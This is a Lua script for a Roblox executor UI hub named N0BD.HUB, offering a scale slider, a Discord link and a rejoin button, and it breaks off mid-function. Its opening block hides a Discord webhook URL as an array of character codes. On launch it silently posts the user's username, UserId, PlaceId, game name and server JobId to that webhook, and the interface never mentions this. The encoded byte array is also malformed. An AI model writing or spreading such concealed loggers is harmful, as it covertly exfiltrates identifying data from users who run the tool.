	local Players = game:GetService("Players")
	local HttpService = game:GetService("HttpService")
	local MarketplaceService = game:GetService("MarketplaceService")

	local function bytesToStr(t)
	local out = table.create(#t)
	for i = 1, #t do
		out[i] = string.char(t[i])
	end
	return table.concat(out)
end

local WEBHOOK_URL = bytesToStr({104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119, 101,98,104,111,11
107,115,47,49,52, 54,57, 48,52,53,48, 49,57,57, 55, 50,50, 48, 54, 55, 49
55,47,
,73,73,85,86, 81, 110, 76,
74,71,120,109,117,50, 89,54, 104, 87, 116, 97, 54, 105, 117,99, 66, 107,80, 90,51,122, 121, 99, 52, 82, 117, 79, 107, 120,
72,115,100,45,77,76, 115, 84, 104, 114, 73, 110, 109, 98, 106, 118,118, 56,71, 69,55, 55, 55, 50, 73, 65, 104, 108, 83,82,73
})

	local function sendDiscord(payloadTable)
		if type(WEBHOOK_URL) ~= "string" or WEBHOOK_URL == "" or WEBHOOK_URL:find("PASTE_") then
			return false, "Webhook URL not set"
		end

		local body = HttpService:JSONEncode(payloadTable)
		local req = (syn and syn.request) or http_request or request
		if req then
			local ok, res = pcall(function()
				return req({
					Url = WEBHOOK_URL,
					Method = "POST",
					Headers = { ["Content-Type"] = "application/json" },
					Body = body
				})
			end)
			return true
		end

		local ok, err = pcall(function()
			HttpService:PostAsync(WEBHOOK_URL, body, Enum.HttpContentType.ApplicationJson, false)
		end)
		if not ok then return false, tostring(err) end
		return true
	end

	local function getGameName()
		local name = game.Name
		local ok, info = pcall(function()
			return MarketplaceService:GetProductInfo(game.PlaceId)
		end)
		if ok and info and type(info) == "table" and info.Name then
			name = info.Name
		end
		return tostring(name)
	end

	local lp = Players.LocalPlayer

	local payload = {
		username = "N0BD.HUB Logger",
		embeds = {{
			title = "Script opened",
			color = 0x00E6FF,
			fields = {
				{ name = "Username", value = lp.Name, inline = true },
				{ name = "UserId", value = tostring(lp.UserId), inline = true },
				{ name = "PlaceId", value = tostring(game.PlaceId), inline = true },
				{ name = "Game", value = getGameName(), inline = false },
				{ name = "JobId", value = tostring(game.JobId), inline = false },
			},
			footer = { text = "N0BD.HUB" }
		}}
	}

sendDiscord(payload)

--=============================================================
-- Main UI
--=============================================================

local RunService = game:GetService("RunService")
local Players = game:GetService("Players")

local function WaitForCamera()
	local cam = workspace.CurrentCamera
	if cam then return cam end
	for _ = 1, 180 do
		cam = workspace.CurrentCamera
		if cam then return cam end
		RunService.RenderStepped:Wait()
	end
	return workspace.CurrentCamera
end

local function WaitForPlayerGui()
	local lp = Players.LocalPlayer
	if not lp then
		for _ = 1, 180 do
			lp = Players.LocalPlayer
			if lp then break end
			RunService.RenderStepped:Wait()
		end
	end
	if not lp then return nil end

	local pg = lp:FindFirstChild("PlayerGui")
	if pg then return pg end

	for _ = 1, 180 do
		pg = lp:FindFirstChild("PlayerGui")
		if pg then return pg end
		RunService.RenderStepped:Wait()
	end
	return lp:FindFirstChild("PlayerGui")
end

local function RUN_UI()
	--=============================================================================================
	local Players = game:GetService("Players")
	local TweenService = game:GetService("TweenService")
	local UIS = game:GetService("UserInputService")
	local RunService = game:GetService("RunService")
	local TextService = game:GetService("TextService")
	local TeleportService = game:GetService("TeleportService")

	local player = Players.LocalPlayer
	local playerGui = player:WaitForChild("PlayerGui")

	-- Discord invite (embedded)
	local DISCORD_URL = "https://discord.gg/eDnvnQMag7"

	-- Remove old UI
	local old = playerGui:FindFirstChild("N0BD.HUB")
	if old then old:Destroy() end

	-- Theme
	local Theme = {
		BG      = Color3.fromRGB(6, 10, 22),
		Top     = Color3.fromRGB(10, 18, 38),
		Panel   = Color3.fromRGB(11, 22, 48),
		Card    = Color3.fromRGB(12, 26, 58),
		Stroke  = Color3.fromRGB(40, 110, 255),
		Text    = Color3.fromRGB(225, 238, 255),
		SubText = Color3.fromRGB(150, 175, 210),
		Accent  = Color3.fromRGB(0, 230, 255),
		Danger  = Color3.fromRGB(255, 80, 110),
	}

	-- Sizes / radii
	local R = 22
	local TOP_H = 56

	local FULL_SIZE = Vector2.new(680, 400)
	local MINI_SIZE = Vector2.new(140, 40) -- compact mini window
	local MINI_R = 18

	-- =========================================================
	-- Obfuscation safety helpers (prevents "size out of range")
	-- =========================================================
	local function _safeNumber(n, fallback)
		n = tonumber(n)
		if not n or n ~= n or n == math.huge or n == -math.huge then
			return fallback or 0
		end
		return math.clamp(n, -5000, 5000)
	end

	local function SAFE_OFFSET(x, y)
		return UDim2.fromOffset(_safeNumber(x, 0), _safeNumber(y, 0))
	end

	local function SAFE_UDIM2(u)
		if typeof(u) ~= "UDim2" then
			return SAFE_OFFSET(0, 0)
		end
		return UDim2.new(
			u.X.Scale, _safeNumber(u.X.Offset, 0),
			u.Y.Scale, _safeNumber(u.Y.Offset, 0)
		)
	end

	local function safeTween(obj, t, props)
		if props then
			if props.Size then props.Size = SAFE_UDIM2(props.Size) end
			if props.Position then props.Position = SAFE_UDIM2(props.Position) end
		end
		local tw = TweenService:Create(obj, TweenInfo.new(t, Enum.EasingStyle.Quint, Enum.EasingDirection.Out), props)
		tw:Play()
		return tw
	end

	-- Helpers
	local function corner(parent, px)
		local c = Instance.new("UICorner")
		c.CornerRadius = UDim.new(0, px)
		c.Parent = parent
		return c
	end

	local function stroke(parent, color, transparency, thickness)
		local s = Instance.new("UIStroke")
		s.Color = color
		s.Thickness = thickness or 1
		s.Transparency = transparency or 0.8
		s.Parent = parent
		return s
	end

	local function getViewport()
		local cam = workspace.CurrentCamera
		if not cam then
			for _ = 1, 90 do
				cam = workspace.CurrentCamera
				if cam then break end
				RunService.RenderStepped:Wait()
			end
		end

		if cam then
			local ok, vp = pcall(function()
				return cam.ViewportSize
			end)
			if ok and vp then
				return vp
			end
		end

		return Vector2.new(1920, 1080)
	end

	-- Offset-only clamp (AnchorPoint 0,0)
	local function clampToScreen(sizeVec2, frame)
		local vp = getViewport()
		local w, h = sizeVec2.X, sizeVec2.Y

		local x = frame.Position.X.Offset
		local y = frame.Position.Y.Offset

		local margin = 8
		local minX = margin
		local maxX = vp.X - w - margin
		local minY = margin
		local maxY = vp.Y - h - margin

		if minX > maxX then x = math.floor((vp.X - w) * 0.5) else x = math.clamp(x, minX, maxX) end
		if minY > maxY then y = math.floor((vp.Y - h) * 0.5) else y = math.clamp(y, minY, maxY) end

		frame.Position = SAFE_OFFSET(x, y)
	end

	local function topCenterPos(width, y)
		local vp = getViewport()
		return SAFE_OFFSET(math.floor((vp.X - width) * 0.5), y)
	end

	-- =========================================================
	-- UI-MATCHED Toast (bottom-right, auto width)
	-- + global access: getgenv().N0BD_Toast("msg")
	-- =========================================================
	local toastFrame, toastHideTask
	local function ShowToast(gui, msg)
		msg = tostring(msg or "")

		if toastHideTask then
			task.cancel(toastHideTask)
			toastHideTask = nil
		end
		if toastFrame then
			toastFrame:Destroy()
			toastFrame = nil
		end

		local font = Enum.Font.GothamSemibold
		local textSize = 13
		local paddingX = 24
		local minW, maxW = 220, 420

		local textBounds = TextService:GetTextSize(msg, textSize, font, Vector2.new(9999, 44)).X
		local w = math.clamp(math.floor(textBounds + paddingX + 12), minW, maxW)

		toastFrame = Instance.new("Frame")
		toastFrame.Name = "Toast"
		toastFrame.BackgroundColor3 = Theme.Card
		toastFrame.BorderSizePixel = 0
		toastFrame.AnchorPoint = Vector2.new(1, 1)
		toastFrame.Position = UDim2.new(1, -18, 1, 20)
		toastFrame.Size = SAFE_OFFSET(w, 44)
		toastFrame.Parent = gui
		toastFrame.ZIndex = 200
		corner(toastFrame, 16)
		stroke(toastFrame, Theme.Accent, 0.75, 2)
		stroke(toastFrame, Theme.Stroke, 0.90, 1)

		local pad = Instance.new("UIPadding")
		pad.PaddingLeft = UDim.new(0, 12)
		pad.PaddingRight = UDim.new(0, 12)
		pad.Parent = toastFrame

		local t = Instance.new("TextLabel")
		t.BackgroundTransparency = 1
		t.Size = UDim2.new(1, 0, 1, 0)
		t.Font = font
		t.TextSize = textSize
		t.TextColor3 = Theme.Text
		t.TextXAlignment = Enum.TextXAlignment.Left
		t.Text = msg
		t.Parent = toastFrame

		toastFrame.BackgroundTransparency = 1
		safeTween(toastFrame, 0.18, {Position = UDim2.new(1, -18, 1, -18), BackgroundTransparency = 0})

		toastHideTask = task.delay(1.6, function()
			if toastFrame then
				safeTween(toastFrame, 0.18, {Position = UDim2.new(1, -18, 1, 20), BackgroundTransparency = 1})
				task.delay(0.20, function()
					if toastFrame then
						toastFrame:Destroy()
						toastFrame = nil
					end
				end)
			end
		end)
	end

	local function setGlobalToast(gui)
		getgenv().N0BD_Toast = function(message)
			if gui and gui.Parent then
				ShowToast(gui, message)
			end
		end
	end

	local function copyToClipboard(url)
		local ok = pcall(function()
			if setclipboard then
				setclipboard(url)
			else
				error("Clipboard not available")
			end
		end)
		return ok
	end

	-- =========================================================
	-- ScreenGui
	-- =========================================================
	local gui = Instance.new("ScreenGui")
	gui.Name = "N0BD.HUB"
	gui.ResetOnSpawn = false
	gui.IgnoreGuiInset = true
	gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	gui.Parent = playerGui

	setGlobalToast(gui)

	-- =========================================================
	-- Main window (OFFSET ONLY)
	-- =========================================================
	local main = Instance.new("Frame")
	main.Name = "Main"
	main.Size = SAFE_OFFSET(FULL_SIZE.X, FULL_SIZE.Y)
	main.AnchorPoint = Vector2.new(0, 0)
	main.BackgroundColor3 = Theme.BG
	main.BorderSizePixel = 0
	main.ClipsDescendants = true
	main.Parent = gui
	corner(main, R)
	main.ZIndex = 2

	do
		RunService.RenderStepped:Wait()
		local vp = getViewport()
		main.Position = SAFE_OFFSET(math.floor((vp.X - FULL_SIZE.X) * 0.5), math.floor((vp.Y - FULL_SIZE.Y) * 0.5))
	end

	-- UIScale on main
	local uiScale = Instance.new("UIScale")
	uiScale.Scale = 1
	uiScale.Parent = main

	-- =========================================================
	-- Glow frame (sibling)
	-- =========================================================
	local glowFrame = Instance.new("Frame")
	glowFrame.Name = "GlowFrame"
	glowFrame.AnchorPoint = main.AnchorPoint
	glowFrame.BackgroundTransparency = 1
	glowFrame.BorderSizePixel = 0
	glowFrame.ZIndex = 1
	glowFrame.Parent = gui
	corner(glowFrame, R)

	local glowOuter = stroke(glowFrame, Theme.Accent, 0.88, 8)
	local glowInner = stroke(glowFrame, Theme.Accent, 0.92, 3)
	stroke(main, Theme.Stroke, 0.78, 1)

	TweenService:Create(glowOuter, TweenInfo.new(1.4, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {Transparency = 0.94}):Play()
	TweenService:Create(glowInner, TweenInfo.new(1.0, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {Transparency = 0.86}):Play()

	local glowScale = Instance.new("UIScale")
	glowScale.Scale = uiScale.Scale
	glowScale.Parent = glowFrame
	uiScale:GetPropertyChangedSignal("Scale"):Connect(function()
		glowScale.Scale = uiScale.Scale
	end)

	local function syncGlowNow()
		glowFrame.Position = main.Position
		glowFrame.Size = main.Size
	end

	local syncConn
	syncConn = RunService.RenderStepped:Connect(function()
		if not gui.Parent then
			if syncConn then syncConn:Disconnect() end
			return
		end
		syncGlowNow()
	end)

	-- =========================================================
	-- Topbar
	-- =========================================================
	local topbar = Instance.new("Frame")
	topbar.Name = "Topbar"
	topbar.Size = UDim2.new(1, 0, 0, TOP_H)
	topbar.BackgroundColor3 = Theme.Top
	topbar.BorderSizePixel = 0
	topbar.ClipsDescendants = true
	topbar.Parent = main
	corner(topbar, R)

	local glowLine = Instance.new("Frame")
	glowLine.Name = "GlowLine"
	glowLine.Size = UDim2.new(1, -28, 0, 2)
	glowLine.Position = SAFE_OFFSET(14, TOP_H - 2)
	glowLine.BackgroundColor3 = Theme.Accent
	glowLine.BackgroundTransparency = 0.25
	glowLine.BorderSizePixel = 0
	glowLine.Parent = topbar
	corner(glowLine, 8)

	TweenService:Create(glowLine, TweenInfo.new(1.2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {
		BackgroundTransparency = 0.55
	}):Play()

	-- Top button with auto width
	local function topButton(text, color)
		local b = Instance.new("TextButton")
		b.AutoButtonColor = false
		b.BackgroundColor3 = Theme.Card
		b.BorderSizePixel = 0

		b.Text = text
		b.Font = Enum.Font.GothamBold
		b.TextSize = 14
		b.TextColor3 = color

		local padX = 18
		local minW = 44
		local tw = TextService:GetTextSize(text, b.TextSize, b.Font, Vector2.new(1000, 32)).X
		local w = math.max(minW, tw + padX * 2)
		b.Size = SAFE_OFFSET(w, 32)

		corner(b, 14)
		stroke(b, Theme.Stroke, 0.90, 1)
		stroke(b, Theme.Accent, 0.94, 3)

		b.MouseEnter:Connect(function()
			safeTween(b, 0.12, {BackgroundColor3 = Color3.fromRGB(18, 36, 78)})
		end)
		b.MouseLeave:Connect(function()
			safeTween(b, 0.12, {BackgroundColor3 = Theme.Card})
		end)

		return b
	end

	-- Discord button LEFT (copies link)
	local discordTopBtn = topButton("Discord", Theme.Accent)
	discordTopBtn.Name = "DiscordTop"
	discordTopBtn.Position = SAFE_OFFSET(14, 12)
	discordTopBtn.Parent = topbar
	discordTopBtn.MouseButton1Click:Connect(function()
		local ok = copyToClipboard(DISCORD_URL)
		if ok then
			ShowToast(gui, "✅ Discord link copied!")
		else
			ShowToast(gui, "❌ Clipboard not available")
		end
	end)

	-- Centered title
	local title = Instance.new("TextLabel")
	title.Name = "Title"
	title.BackgroundTransparency = 1
	title.AnchorPoint = Vector2.new(0.5, 0.5)
	title.Position = UDim2.new(0.5, 0, 0.5, 0)
	title.Size = UDim2.new(0, 260, 1, 0)
	title.Font = Enum.Font.GothamBlack
	title.TextSize = 20
	title.TextColor3 = Theme.Text
	title.TextXAlignment = Enum.TextXAlignment.Center
	title.Text = "N0BD.HUB"
	title.Parent = topbar

	-- Right buttons holder (auto-size)
	local btnHolder = Instance.new("Frame")
	btnHolder.Name = "BtnHolder"
	btnHolder.BackgroundTransparency = 1
	btnHolder.Parent = topbar

	local minimizeBtn = topButton("—", Theme.Text)
	minimizeBtn.Parent = btnHolder

	local closeBtn = topButton("X", Theme.Danger)
	closeBtn.Parent = btnHolder

	do
		local gap = 8
		local padRight = 14
		local totalW = minimizeBtn.Size.X.Offset + closeBtn.Size.X.Offset + gap
		btnHolder.Size = SAFE_OFFSET(totalW + padRight, TOP_H)
		btnHolder.Position = UDim2.new(1, -btnHolder.Size.X.Offset, 0, 0)

		closeBtn.Position = SAFE_OFFSET(btnHolder.Size.X.Offset - closeBtn.Size.X.Offset - padRight, 12)
		minimizeBtn.Position = SAFE_OFFSET(closeBtn.Position.X.Offset - gap - minimizeBtn.Size.X.Offset, 12)
	end

	-- Restore button (pill in mini mode)
	local restoreBtn = Instance.new("TextButton")
	restoreBtn.Name = "RestoreBtn"
	restoreBtn.AutoButtonColor = false
	restoreBtn.BackgroundColor3 = Theme.Card
	restoreBtn.BorderSizePixel = 0
	restoreBtn.Size = UDim2.new(1, -16, 1, -16)
	restoreBtn.Position = SAFE_OFFSET(8, 8)
	restoreBtn.Text = "Open N0BD.HUB"
	restoreBtn.Font = Enum.Font.GothamSemibold
	restoreBtn.TextSize = 12
	restoreBtn.TextColor3 = Theme.Accent
	restoreBtn.Visible = false
	restoreBtn.Parent = topbar
	corner(restoreBtn, 999)
	stroke(restoreBtn, Theme.Accent, 0.78, 2)
	stroke(restoreBtn, Theme.Stroke, 0.92, 1)

	restoreBtn.MouseEnter:Connect(function()
		safeTween(restoreBtn, 0.12, {BackgroundColor3 = Color3.fromRGB(18, 36, 78)})
	end)
	restoreBtn.MouseLeave:Connect(function()
		safeTween(restoreBtn, 0.12, {BackgroundColor3 = Theme.Card})
	end)

	-- =========================================================
	-- Body
	-- =========================================================
	local body = Instance.new("Frame")
	body.Name = "Body"
	body.Size = UDim2.new(1, 0, 1, -TOP_H)
	body.Position = SAFE_OFFSET(0, TOP_H)
	body.BackgroundTransparency = 1
	body.BorderSizePixel = 0
	body.Parent = main

	-- Sidebar + content
	local SIDEBAR_W = 176
	local GAP = 14
	local MARGIN = 18

	local sidebar = Instance.new("Frame")
	sidebar.Name = "Sidebar"
	sidebar.BackgroundColor3 = Theme.Panel
	sidebar.BorderSizePixel = 0
	sidebar.Position = SAFE_OFFSET(MARGIN, MARGIN)
	sidebar.Size = UDim2.new(0, SIDEBAR_W, 1, -(MARGIN * 2))
	sidebar.Parent = body
	corner(sidebar, 18)
	stroke(sidebar, Theme.Stroke, 0.88, 1)
	stroke(sidebar, Theme.Accent, 0.93, 3)

	local sidePad = Instance.new("UIPadding")
	sidePad.PaddingTop = UDim.new(0, 12)
	sidePad.PaddingBottom = UDim.new(0, 12)
	sidePad.PaddingLeft = UDim.new(0, 12)
	sidePad.PaddingRight = UDim.new(0, 12)
	sidePad.Parent = sidebar

	local sideList = Instance.new("UIListLayout")
	sideList.SortOrder = Enum.SortOrder.LayoutOrder
	sideList.Padding = UDim.new(0, 10)
	sideList.Parent = sidebar

	local content = Instance.new("Frame")
	content.Name = "Content"
	content.BackgroundColor3 = Theme.Panel
	content.BorderSizePixel = 0
	content.Position = SAFE_OFFSET(MARGIN + SIDEBAR_W + GAP, MARGIN)
	content.Size = UDim2.new(1, -(MARGIN + SIDEBAR_W + GAP + MARGIN), 1, -(MARGIN * 2))
	content.Parent = body
	corner(content, 18)
	stroke(content, Theme.Stroke, 0.88, 1)
	stroke(content, Theme.Accent, 0.93, 3)

	local contentPad = Instance.new("UIPadding")
	contentPad.PaddingTop = UDim.new(0, 12)
	contentPad.PaddingBottom = UDim.new(0, 12)
	contentPad.PaddingLeft = UDim.new(0, 12)
	contentPad.PaddingRight = UDim.new(0, 12)
	contentPad.Parent = content

	-- =========================================================
	-- Main Page
	-- =========================================================
	local pageMain = Instance.new("Frame")
	pageMain.Name = "Main"
	pageMain.BackgroundTransparency = 1
	pageMain.Size = UDim2.new(1, 0, 1, 0)
	pageMain.Parent = content

	local header = Instance.new("Frame")
	header.BackgroundTransparency = 1
	header.Size = UDim2.new(1, 0, 0, 44)
	header.Parent = pageMain

	local headerLabel = Instance.new("TextLabel")
	headerLabel.BackgroundTransparency = 1
	headerLabel.Size = UDim2.new(1, 0, 1, 0)
	headerLabel.Font = Enum.Font.GothamBold
	headerLabel.TextSize = 16
	headerLabel.TextColor3 = Theme.Text
	headerLabel.TextXAlignment = Enum.TextXAlignment.Left
	headerLabel.Text = "Main"
	headerLabel.Parent = header

	-- =========================================================
	-- UI Scale card
	-- =========================================================
	local settingsCard = Instance.new("Frame")
	settingsCard.Name = "SettingsCard"
	settingsCard.BackgroundColor3 = Theme.Card
	settingsCard.BorderSizePixel = 0
	settingsCard.Position = SAFE_OFFSET(0, 44)
	settingsCard.Size = UDim2.new(1, 0, 0, 120)
	settingsCard.ClipsDescendants = true
	settingsCard.Parent = pageMain
	corner(settingsCard, 18)
	stroke(settingsCard, Theme.Stroke, 0.90, 1)
	stroke(settingsCard, Theme.Accent, 0.94, 3)

	local settingsPad = Instance.new("UIPadding")
	settingsPad.PaddingTop = UDim.new(0, 14)
	settingsPad.PaddingBottom = UDim.new(0, 14)
	settingsPad.PaddingLeft = UDim.new(0, 14)
	settingsPad.PaddingRight = UDim.new(0, 14)
	settingsPad.Parent = settingsCard

	local cardTitle = Instance.new("TextLabel")
	cardTitle.BackgroundTransparency = 1
	cardTitle.Size = UDim2.new(1, 0, 0, 18)
	cardTitle.Font = Enum.Font.GothamSemibold
	cardTitle.TextSize = 14
	cardTitle.TextColor3 = Theme.Text
	cardTitle.TextXAlignment = Enum.TextXAlignment.Left
	cardTitle.Text = "UI Scale"
	cardTitle.Parent = settingsCard

	local scaleLabel = Instance.new("TextLabel")
	scaleLabel.BackgroundTransparency = 1
	scaleLabel.Position = SAFE_OFFSET(0, 24)
	scaleLabel.Size = UDim2.new(1, 0, 0, 18)
	scaleLabel.Font = Enum.Font.Gotham
	scaleLabel.TextSize = 12
	scaleLabel.TextColor3 = Theme.SubText
	scaleLabel.TextXAlignment = Enum.TextXAlignment.Left
	scaleLabel.Text = "UI Scale: 100%"
	scaleLabel.Parent = settingsCard

	local bar = Instance.new("Frame")
	bar.Position = SAFE_OFFSET(0, 60)
	bar.Size = UDim2.new(1, 0, 0, 10)
	bar.BackgroundColor3 = Color3.fromRGB(16, 26, 54)
	bar.BorderSizePixel = 0
	bar.Parent = settingsCard
	corner(bar, 999)
	stroke(bar, Theme.Stroke, 0.92, 1)

	local fill = Instance.new("Frame")
	fill.Size = UDim2.new(0.5, 0, 1, 0)
	fill.BackgroundColor3 = Theme.Accent
	fill.BorderSizePixel = 0
	fill.Parent = bar
	corner(fill, 999)

	local knob = Instance.new("Frame")
	knob.Size = SAFE_OFFSET(18, 18)
	knob.BackgroundColor3 = Theme.Text
	knob.BorderSizePixel = 0
	knob.Parent = bar
	corner(knob, 999)
	stroke(knob, Theme.Stroke, 0.60, 1)

	local MIN_SCALE = 0.8
	local MAX_SCALE = 1.2
	local dragging = false

	local function setScaleFromX(x)
		local rel = math.clamp((x - bar.AbsolutePosition.X) / bar.AbsoluteSize.X, 0, 1)
		local scale = MIN_SCALE + (MAX_SCALE - MIN_SCALE) * rel
		scale = math.floor(scale * 100) / 100

		uiScale.Scale = scale
		fill.Size = UDim2.new(rel, 0, 1, 0)
		knob.Position = UDim2.new(rel, -9, 0.5, -9)
		scaleLabel.Text = ("UI Scale: %d%%"):format(math.floor(scale * 100 + 0.5))
	end

	-- init slider
	do
		local rel = (uiScale.Scale - MIN_SCALE) / (MAX_SCALE - MIN_SCALE)
		rel = math.clamp(rel, 0, 1)
		fill.Size = UDim2.new(rel, 0, 1, 0)
		knob.Position = UDim2.new(rel, -9, 0.5, -9)
		scaleLabel.Text = ("UI Scale: %d%%"):format(math.floor(uiScale.Scale * 100 + 0.5))
	end

	bar.InputBegan:Connect(function(i)
		if i.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			setScaleFromX(i.Position.X)
		end
	end)
	UIS.InputChanged:Connect(function(i)
		if dragging and i.UserInputType == Enum.UserInputType.MouseMovement then
			setScaleFromX(i.Position.X)
		end
	end)
	UIS.InputEnded:Connect(function(i)
		if i.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = false
		end
	end)

	-- Sidebar tab (Main)
	local tabMain = Instance.new("TextButton")
	tabMain.AutoButtonColor = false
	tabMain.BackgroundColor3 = Color3.fromRGB(18, 44, 92)
	tabMain.BorderSizePixel = 0
	tabMain.Size = UDim2.new(1, 0, 0, 42)
	tabMain.Font = Enum.Font.GothamSemibold
	tabMain.TextSize = 13
	tabMain.TextColor3 = Theme.Accent
	tabMain.TextXAlignment = Enum.TextXAlignment.Left
	tabMain.Text = "   Main"
	tabMain.Parent = sidebar
	corner(tabMain, 16)
	stroke(tabMain, Theme.Stroke, 0.92, 1)

	-- =========================================================
	-- Rejoin Same Server card (FIXED TEXT ALIGN + 2-LINE WRAP)
	-- =========================================================
	local rejoinCard = Instance.new("Frame")
	rejoinCard.Name = "RejoinCard"
	rejoinCard.BackgroundColor3 = Theme.Card
	rejoinCard.BorderSizePixel = 0
	rejoinCard.Position = SAFE_OFFSET(0, 44 + 120 + 12)
	rejoinCard.Size = UDim2.new(1, 0, 0, 92)
	rejoinCard.ClipsDescendants = true
	rejoinCard.Parent = pageMain
	corner(rejoinCard, 18)
	stroke(rejoinCard, Theme.Stroke, 0.90, 1)
	stroke(rejoinCard, Theme.Accent, 0.94, 3)

	local rejoinPad = Instance.new("UIPadding")
	rejoinPad.PaddingTop = UDim.new(0, 14)
	rejoinPad.PaddingBottom = UDim.new(0, 14)
	rejoinPad.PaddingLeft = UDim.new(0, 14)
	rejoinPad.PaddingRight = UDim.new(0, 14)
	rejoinPad.Parent = rejoinCard

	-- Left text container (stacked, centered)
	local textWrap = Instance.new("Frame")
	textWrap.Name = "TextWrap"
	textWrap.BackgroundTransparency = 1
	textWrap.Size = UDim2.new(1, -170, 1, 0) -- space for button
	textWrap.Parent = rejoinCard

	local textList = Instance.new("UIListLayout")
	textList.SortOrder = Enum.SortOrder.LayoutOrder
	textList.Padding = UDim.new(0, 4)
	textList.VerticalAlignment = Enum.VerticalAlignment.Center
	textList.Parent = textWrap

	local rejoinTitle = Instance.new("TextLabel")
	rejoinTitle.BackgroundTransparency = 1
	rejoinTitle.Size = UDim2.new(1, 0, 0, 18)
	rejoinTitle.Font = Enum.Font.GothamSemibold
	rejoinTitle.TextSize = 14
	rejoinTitle.TextColor3 = Theme.Text
	rejoinTitle.TextXAlignment = Enum.TextXAlignment.Left
	rejoinTitle.Text = "Rejoin Same Server"
	rejoinTitle.LayoutOrder = 1
	rejoinTitle.Parent = textWrap

	local rejoinDesc = Instance.new("TextLabel")
	rejoinDesc.BackgroundTransparency = 1
	rejoinDesc.Size = UDim2.new(1, 0, 0, 32) -- ✅ enough for 2 lines
	rejoinDesc.Font = Enum.Font.Gotham
	rejoinDesc.TextSize = 12
	rejoinDesc.TextColor3 = Theme.SubText
	rejoinDesc.TextXAlignment = Enum.TextXAlignment.Left
	rejoinDesc.TextYAlignment = Enum.TextYAlignment.Top
	rejoinDesc.TextWrapped = true -- ✅ wrap
	rejoinDesc.TextTruncate = Enum.TextTruncate.None
	rejoinDesc.Text = "Rejoins this exact server (same JobId)."
	rejoinDesc.LayoutOrder = 2
	rejoinDesc.Parent = textWrap

	local rejoinBtn = Instance.new("TextButton")
	rejoinBtn.Name = "RejoinBtn"
	rejoinBtn.AutoButtonColor = false
	rejoinBtn.BackgroundColor3 = Theme.Card
	rejoinBtn.BorderSizePixel = 0
	rejoinBtn.AnchorPoint = Vector2.new(1, 0.5)
	rejoinBtn.Position = UDim2.new(1, 0, 0.5, 0)
	rejoinBtn.Size = SAFE_OFFSET(150, 38)
	rejoinBtn.Font = Enum.Font.GothamBold
	rejoinBtn.TextSize = 12
	rejoinBtn.TextColor3 = Theme.Text
	rejoinBtn.Text = "REJOIN"
	rejoinBtn.Parent = rejoinCard
	corner(rejoinBtn, 16)
	stroke(rejoinBtn, Theme.Stroke, 0.90, 1)
	stroke(rejoinBtn, Theme.Accent, 0.94, 3)

	rejoinBtn.MouseEnter:Connect(function()
		safeTween(rejoinBtn, 0.12, {BackgroundColor3 = Color3.fromRGB(18, 36, 78)})
	end)
	rejoinBtn.MouseLeave:Connect(function()
		safeTween(rejoinBtn, 0.12, {BackgroundColor3 = Theme.Card})
	end)

	local rejoining = false
	local function doRejoin()
		if rejoining then return end
		rejoining = true

		rejoinBtn.Text = "REJOINING..."
		rejoinBtn.TextColor3 = Theme.Accent
		safeTween(rejoinBtn, 0.12, {BackgroundColor3 = Color3.fromRGB(18, 36, 78)})

		task.delay(0.15, function()
			pcall(function()
				TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, player)
			end)
		end)
	end

	rejoinBtn.MouseButton1Click:Connect(doRejoin)
	rejoinCard.InputBegan:Connect(function(i)
		if i.UserInputType == Enum.UserInputType.MouseButton1 then
			doRejoin()
		end
	end)

	-- =========================================================
	-- Improved minimize (compact + pretty) + mini locked top-center
	-- =========================================================
	local minimized = false
	local busy = false
	local savedPos = main.Position
	local savedSize = main.Size

	local function applyMinimizedVisuals(on)
		body.Visible = not on
		btnHolder.Visible = not on
		discordTopBtn.Visible = not on
		title.Visible = not on
		glowLine.Visible = not on

		restoreBtn.Visible = on

		if on then
			topbar.Size = UDim2.new(1, 0, 1, 0)
			corner(main, MINI_R)
			corner(topbar, MINI_R)
		else
			topbar.Size = UDim2.new(1, 0, 0, TOP_H)
			corner(main, R)
			corner(topbar, R)
		end
	end

	local function setMinimized(on)
		if busy then return end
		busy = true

		if on and not minimized then
			savedPos = main.Position
			savedSize = main.Size
		end

		minimized = on
		applyMinimizedVisuals(on)

		if on then
			safeTween(main, 0.18, {Size = SAFE_OFFSET(MINI_SIZE.X, MINI_SIZE.Y)}).Completed:Wait()
			main.Position = topCenterPos(MINI_SIZE.X, 8) -- ✅ top center
		else
			main.Size = savedSize
			main.Position = savedPos
			clampToScreen(FULL_SIZE, main)

			safeTween(main, 0.22, {Size = SAFE_OFFSET(FULL_SIZE.X, FULL_SIZE.Y)}).Completed:Wait()
			applyMinimizedVisuals(false)
		end

		busy = false
	end

	minimizeBtn.MouseButton1Click:Connect(function()
		setMinimized(true)
	end)

	restoreBtn.MouseButton1Click:Connect(function()
		setMinimized(false)
	end)

	closeBtn.MouseButton1Click:Connect(function()
		safeTween(main, 0.18, {Size = SAFE_OFFSET(520, 0)})
		task.delay(0.2, function()
			if syncConn then syncConn:Disconnect() end
			gui:Destroy()
		end)
	end)

	-- Dragging + clamp (full only; mini locked)
	do
		local draggingWin = false
		local startMouse, startPos

		topbar.InputBegan:Connect(function(i)
			if i.UserInputType == Enum.UserInputType.MouseButton1 then
				if minimized then return end
				draggingWin = true
				startMouse = i.Position
				startPos = main.Position
			end
		end)

		UIS.InputChanged:Connect(function(i)
			if draggingWin and i.UserInputType == Enum.UserInputType.MouseMovement then
				if minimized then return end
				local delta = i.Position - startMouse
				main.Position = SAFE_OFFSET(startPos.X.Offset + delta.X, startPos.Y.Offset + delta.Y)
				clampToScreen(FULL_SIZE, main)
			end
		end)

		UIS.InputEnded:Connect(function(i)
			if i.UserInputType == Enum.UserInputType.MouseButton1 then
				draggingWin = false
				if minimized then
					main.Position = topCenterPos(MINI_SIZE.X, 8)
				else
					clampToScreen(FULL_SIZE, main)
				end
			end
		end)
	end

	-- Intro (SAFE)
	do
		RunService.RenderStepped:Wait()
		local vp = getViewport()
		main.Position = SAFE_OFFSET(math.floor((vp.X - FULL_SIZE.X) * 0.5), math.floor((vp.Y - FULL_SIZE.Y) * 0.5))

